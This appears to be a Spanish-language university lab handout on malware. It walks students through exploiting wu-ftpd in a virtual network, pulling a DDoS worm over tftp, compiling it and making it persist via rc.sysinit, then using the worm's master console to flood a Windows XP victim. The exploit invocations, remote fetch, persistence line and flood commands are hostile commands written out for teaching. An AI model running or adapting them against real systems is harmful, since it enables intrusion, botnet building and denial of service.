Asignatura : Seguridad Informtica

Docente : Gonzalo Martin Valdivia

LABORATORIO 4 MALWARE
OBJETIVOS
Analizar las tcnicas de Infeccin de Malware DDOS.
Detectar actividad maliciosa.
PROCEDIMIENTO
PARTE 1
Activaremos y configuraremos al INTRUSO y MASTERX.
Nota: Debido a que usaremos varias maquinas virtuales, al abrirles en
el vmware proceda a etiquetarlas (IN, MX, A1, A2, MY, A3): Menu VM >
Settings > Lengeta Options > Clic General
MAQUINA VIRTUAL PREPARADA INTRUSO
1. (IN) Se ha preparado una Maquina Virtual REDHAT 6.1:
Active la maquina virtual IN.
Al activar la maquina virtual:
Login: root
Password: ******

Configurando la conectividad de IP:

# ifconfig eth0 192.168.90.113

MAQUINA VIRTUAL PREPARADA MASTER X

2. (MX) Se ha preparado una Maquina Virtual REDHAT 6.1 (Linux Complice):
Renombre el directorio de la maquina virtual a MX
Active la maquina virtual.
Configurando la conectividad de IP:
# ifconfig eth0 192.168.90.114

PARTE 2
El INTRUSO infectara a MASTER, atacando la vulnerabilidad de wu-ftp. A
travs de esta vulnerabilidad se instalara el Gusano de DDoS
stachelantigl. Este gusano esta compuesta por 3 partes (Atacante,
Master o Manager, Agente)
Nota: En la PC intruso se ha preparado un directorio /soft , con las
diferentes herramientas a usar.
DIRECTORIO TFTP
3. (IN) Crear el directorio RAIZ del TFTP y copiar stachelantigl:
# mkdir /tftpboot
# cp /soft/dos/stachelantigl.tar /tftpboot

ENVIAR EXPLOIT
4. (IN) Descomprima la herramienta de exploit ftp :
# cd /soft/vulne

-1-

# tar zxvf ftp.tar

# cd ftp
5. (IN) Realizando el ataque:
# ./awu 192.168.90.114
Nota: Al realizar el exploit aparecer el siguiente mensaje:
uid=o(root) gid=0(root) eigd=50(ftp) groups=50(ftp)
Linux rh61.empresa.com.pe

ACCIONES
6. (IN) Se est dentro de la maquina MASTER. No visualizara ningn prompt. Pero
ya esta en dicha maquina.
OBJETIVO: En la ventana donde hemos ingresado a la victima,
crearemos un directorio temporal para transferir el gusano, luego
descomprimir, compilar y activar. Lo comandos que esta sombreado o
en cuadrado es la accin a tipear.
TRANSFERENCIA

mkdir /tmp/dos
cd /tmp/dos
pwd
/tmp/dos
tftp 192.168.90.113
get stachelantigl.tar
exit

Obteniendo el gusano. Espere

unos 5 segundos.

Para salir del programa ataque aplique: <CTRL> + <c>

Vuelva a realizar el ataque: # ./awu 192.168.90.114
INSTALACION

cd /tmp/dos
pwd
/tmp/dos
ls
stachelantigl.tar
tar zxvf stachelantigl.tar

Descomprimiendo. Deber
visualizar que aparecen varios
archivos.

COMPILACION

piura: Contrasea de control

del gusano. Cuando el intruso se
conecte ms adelante.

-2-

ACTIVACION

echo /tmp/dos/mserv

>> /etc/rc.d/rc.sysinit

Salir del programa: <CTRL> + <c>

COMPROBAR
7. (MX) Visualice los puertos. El gusano activo la puerta 60001:

INSTALANDO HERRAMIENTA DE CONTROL

8. (IN) Descomprimir y compilar stachelantigl:
# cd /soft/dos
# tar zxvf stachelantigl.tar
# cd telnetc
# make

PRUEBAS DE CONTROL
Nota: El intruso se conectara al Master y establecer una sesin,
autentificndose con passphrase: piura. Luego de unos segundos
deber de aparecer el prompt (status: a!0 d!0)>.
9. (IN) Conectandose al MASTER X :
Conectndose a
192.168.90.114 (MX)

Ingresar la clave: piura

Prompt

Visualizando los comandos que soporta el prompt del gusano:

-3-

Los comandos
empiezan con punto.

PARTE 3
El INTRUSO infectara Al AGENTE A1, atacando la vulnerabilidad de wuftp, a travs de esta vulnerabilidad se instalara el Gusano de DDoS
stachelantigl. Se activara la parte agente del gusano.
MAQUINA VIRTUAL PREPARADA AGENTE A1
10. (A1) Se ha preparado una Maquina Virtual REDHAT 6.1:
Active la maquina virtual.
Configurando la conectividad de IP:
# ifconfig eth0 192.168.90.115
11. (IN) Realic el exploit e infectarlo :
Abra una nueva ventana de consola. (ALT + F2)
Envi el exploit:
# cd /soft/vulne/ftp
# ./awu 192.168.90.115
Nota: Al realizar el exploit aparecer el siguiente mensaje:
uid=o(root) gid=0(root) eigd=50(ftp) groups=50(ftp)
Linux rh61.empresa.com.pe
ACCIONES
12. (IN) A continuacin deber de imaginarse que esta en una consola remota del
AGENTE. No visualizara ningn prompt. Pero detrs es como si lo estuviera.
OBJETIVO: En la ventana donde hemos ingresado al AGENTE, crearemos
un directorio temporal para transferir el gusano, luego
descomprimir, compilar y activar. Lo comandos que esta sombreado o
en cuadrado es la accin a tipear.
TRANSFERENCIA

mkdir /tmp/dos
cd /tmp/dos
pwd
/tmp/dos
tftp 192.168.90.113
get stachelantigl.tar
exit

Para salir del programa ataque aplique: <CTRL> + <c>

Vuelva a realizar el ataque: # ./awu 192.168.90.115

-4-

INSTALACION

cd /tmp/dos
pwd
/tmp/dos
ls
stachelantigl.tar
tar zxvf stachelantigl.tar

Ingresando al directorio
client y compilando
make

IP de los MASTER para

registrarse. Para terminar se
digita 0

COMPILACION

ACTIVACION
Agregando para que se
cargue al iniciar el Sistema
Operativo. Ejecutando el
cliente td

INSCRIPCION
13. (A1) Visualizando envos:
En una ventana de consola ejecute el comando tcpdump
# tcpdump i eth0

El agente enva mensaje de

icmp echo para registrarse en
el Master.

COMPROBANDO TABLA DE AGENTES

14. (IN) Visualizando lista de agentes:
Conmute a la ventana de consola de la Conexin del MASTER (ALT+F1).
Deber de figurar como muerto (dead) o como vivo (live)

Nota: Que aparezca como muerto no indica que esta desactivado,

debido a que el agente esta registrndose continuamente.

-5-

PARTE 4
El INTRUSO infectara ahora al

AGENTES A2.

MAQUINA VIRTUAL PREPARADA AGENTE A2

15. (A2) Se ha preparado una Maquina Virtual REDHAT 6.1 que ha sido infectada:
Descomprima A2.rar
Active la maquina virtual.
Configurando la conectividad de IP:
# ifconfig eth0 192.168.90.116
INSCRIPCION
16. (A2) Visualizando envos de inscripcin a 192.168.90.114:
En una ventana de consola ejecute el comando tcpdump
# tcpdump i eth0

PARTE 5
El INTRUSO a travs de la PC MASTER X enviara las acciones de ataques
que realizara los agentes a la VICTIMA
17. (VI) Se h preparado una Maquina Virtual WINDOWS XP:
Descomprima Windows XP I1.rar
Active la maquina virtual.
Configure el dato de conectividad:
IP: 192.168.90.130
DNS: (No DNS) PUERTA DE ENLACE: (Sin puerta de Enlace)
ATAQUE #1 DE ICMP FLOOD
18. (IN) Enviando el ataque de Denegacin de Servicios :
Ubquese en la consola de control: ALT + F1

19. (A1, A2) Visualice el monitoreo y observara grandes cantidades de envos

Ya fue
20. (VI) Monitoree el trafico:

Ejecutando: Inicio > Ejecutar >

taskmgr.exe
En la lengeta Funciones de
Red:

-6-

La orden ha sido
recibida a los 2
agentes (2 bcasts).

21. Deteniendo el ataque:

*Observe que la grafica de la victima

se ha reducido.

ATAQUE #2 DE IP FLOOD
22. (IN) Enviando el ataque de IP:
(status: a!0 d!2) > .mip 192.168.90.130
23. (A1, A2) Visualice el monitoreo y observara grandes cantidades de envos

Ya fue
24. (VI) Monitoree el trafico:

25. Deteniendo el ataque:

EJERCICIO
26. Pruebe tambin los otros tipos de ataques:
COMANDO
.mudp
.msyn
.mnul

ATAQUE
UDP Flood
TCP Syn Flood
NUL Flood

-7-

Cul de todos los tipos de ataques, genera mayor trfico? __________

PARTE 6
Para ampliar el grado de ataque, infectaremos a MASTER (MY) y AGENTE
(A3)
MAQUINA VIRTUAL PREPARADA MASTER Y
27. (MY) Se ha preparado una Maquina Virtual REDHAT 6.1 Infectada:
Descomprima MY.rar
Active la maquina virtual.
Configurando la conectividad de IP:
# ifconfig eth0 192.168.90.214
COMPROBAR
28. (MY) Visualice los puertos. El gusano activo la puerta 60001:

MAQUINA VIRTUAL PREPARADA AGENTE A3

29. (A3) Se ha preparado una Maquina Virtual REDHAT 6.1 infectada:
Descomprima A3.rar
Active la maquina virtual.
Configurando la conectividad de IP:
# ifconfig eth0 192.168.90.215
INSCRIPCION
30. (A3) Visualizando envos de inscripcin a 192.168.90.214:
En una ventana de consola ejecute el comando tcpdump
# tcpdump i eth0

PRUEBAS DE CONTROL
Nota: El intruso se conectara en otra ventana de consola al Master
(MY) y establecer una sesin, autentificndose con passphrase:
piura. Luego de unos segundos deber de aparecer el prompt
(status: a!0 d!0)>.
31. (IN) Conectandose al MASTER Y :
Aperture una nueva ventana de consola: ALT + F3
# cd /soft/dos/telnetc
Conectndose a
192.168.90.214 (MY)

Ingresar la clave: piura

Prompt

-8-

Compruebe la tabla de agentes (.showalive o .showdead). Deber de

figurar el AGENTE (A2) 192.168.90.215

Nota: Puede pasar que al hacer estos comandos salga del programa si
esto sucede deber de volverse a conectarse y continuar con los
siguientes pasos.

PARTE 7
El INTRUSO a travs de la PC MASTER X y MASTER Y enviara las acciones
de ataques que realizara los agentes a la VICTIMA
ATAQUE DE ICMP FLOOD
32. (IN) Enviando el ataque de Denegacin de Servicios:
CONSOLA (ALT + F1) DE CONTROL MX

CONSOLA (ALT + F3) DE CONTROL MY

33. (A1, A2, A3) Visualice el monitoreo y observara grandes cantidades de envos

Ya fue
34. (VI) Monitoree el trafico:

Ejecutando: Inicio >

Ejecutar >
taskmgr.exe
En la lengeta
Funciones de Red:

Nota: La grafica
mostrada es un
plantilla sin trfico.
Diagrame la grafica que
esta visualizando y el
uso de la RED __ %

Nota: No necesariamente se va a visualizar un incremento de trafico,

debido a que es prueba de laboratorio en una red virtual.

-9-